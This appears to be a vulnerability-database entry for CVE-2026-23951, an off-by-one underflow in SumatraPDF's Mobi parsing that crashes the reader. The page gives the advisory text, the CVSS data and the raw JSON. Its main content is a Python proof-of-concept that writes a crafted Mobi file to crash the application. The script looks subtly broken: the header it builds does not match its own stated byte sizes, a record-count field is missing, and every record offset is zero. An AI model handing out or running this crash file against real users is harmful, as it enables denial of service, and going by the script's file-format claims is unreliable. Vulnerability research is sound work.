Security Vulnerability Report
CVE-2026-23951 CVSS 5.5 MEDIUM

CVE-2026-23951

Published: 2026-01-22 01:15:53
Last Modified: 2026-02-17 16:48:48

Description

SumatraPDF is a multi-format reader for Windows. All versions contain an off-by-one error in the validation code that only triggers with exactly 2 records, causing an integer underflow in the size calculation. This bug exists in PalmDbReader::GetRecord when opening a crafted Mobi file, resulting in an out-of-bounds heap read that crashes the app. There are no published fixes at the time of publication.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:sumatrapdfreader:sumatrapdf:-:*:*:*:*:*:*:* - VULNERABLE
SumatraPDF, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2026-23951 PoC - SumatraPDF off-by-one Integer Underflow
# This PoC generates a crafted Mobi file that triggers the vulnerability

import struct
import sys


def create_poc_mobi(filename):
    """
    Create a minimal Mobi file that triggers the off-by-one error
    in PalmDbReader::GetRecord when record_count == 2
    """
    # PDB Header (78 bytes)
    pdb_name = b"BOOKMOBI" + b"\x00" * (32 - 8)   # 32 bytes name
    attributes = struct.pack(">H", 0x0002)         # Database attributes
    version = struct.pack(">H", 0)                 # Version
    creation_time = struct.pack(">I", 0)           # Creation time
    modification_time = struct.pack(">I", 0)       # Modification time
    backup_time = struct.pack(">I", 0)             # Backup time
    modification_number = struct.pack(">I", 0)     # Modification number
    app_info_offset = struct.pack(">I", 78)        # App info offset
    sort_info_offset = struct.pack(">I", 78)       # Sort info offset
    type_creator = b"BOOK" + b"MOBI"               # Type and creator

    # Record List Entry (8 bytes each)
    record_data_offset = struct.pack(">I", 0)      # Data offset
    record_attributes = struct.pack(">B", 0)       # Record attributes
    unique_id = struct.pack(">I", 0)               # Unique ID

    # PalmDOC Header (16 bytes)
    text_length = struct.pack(">I", 0)             # Text length
    record_count = struct.pack(">H", 2)            # Record count = 2 (triggers bug)
    record_size = struct.pack(">H", 4096)          # Record size
    reserved = struct.pack(">I", 0)                # Reserved

    # Build the file
    pdb_header = (pdb_name + attributes + version + creation_time +
                  modification_time + backup_time + modification_number +
                  app_info_offset + sort_info_offset + type_creator)

    # Record list with exactly 2 records
    record_list = b""
    for i in range(2):
        record_list += record_data_offset + record_attributes + unique_id

    palm_doc_header = text_length + record_count + record_size + reserved

    # Malformed record data that triggers the off-by-one
    # The validation code fails when record_count == 2
    record_data = b"A" * 100                       # Minimal record data

    with open(filename, "wb") as f:
        f.write(pdb_header)
        f.write(record_list)
        f.write(palm_doc_header)
        f.write(record_data)

    print(f"[+] PoC file created: {filename}")
    print("[+] Record count set to 2 (triggers off-by-one)")
    print("[+] Open this file with SumatraPDF to trigger the vulnerability")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python cve-2026-23951-poc.py <output.mobi>")
        sys.exit(1)
    create_poc_mobi(sys.argv[1])

References

https://github.com/sumatrapdfreader/sumatrapdf/blob/master/src/PalmDbReader.cpp - Product
https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-hj4w-c5x8-p2hv - Exploit, Vendor Advisory

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23951",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T01:15:52.633",
    "lastModified": "2026-02-17T16:48:48.433",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "SumatraPDF is a multi-format reader for Windows. All versions contain an off-by-one error in the validation code that only triggers with exactly 2 records, causing an integer underflow in the size calculation. This bug exists in PalmDbReader::GetRecord when opening a crafted Mobi file, resulting in an out-of-bounds heap read that crashes the app. There are no published fixes at the time of publication."},
      {"lang": "es", "value": "SumatraPDF es un lector multiformato para Windows. Todas las versiones contienen un error de off-by-one en el código de validación que solo se activa con exactamente 2 registros, causando un subdesbordamiento de enteros en el cálculo del tamaño. Este error existe en PalmDbReader::GetRecord al abrir un archivo Mobi manipulado, resultando en una lectura de montón fuera de límites que bloquea la aplicación. No hay correcciones publicadas en el momento de la publicación."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-125"},
          {"lang": "en", "value": "CWE-191"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-193"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:sumatrapdfreader:sumatrapdf:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "EDC837AF-B0DA-4A27-8CF4-EE8846526B37"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/sumatrapdfreader/sumatrapdf/blob/master/src/PalmDbReader.cpp",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-hj4w-c5x8-p2hv",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}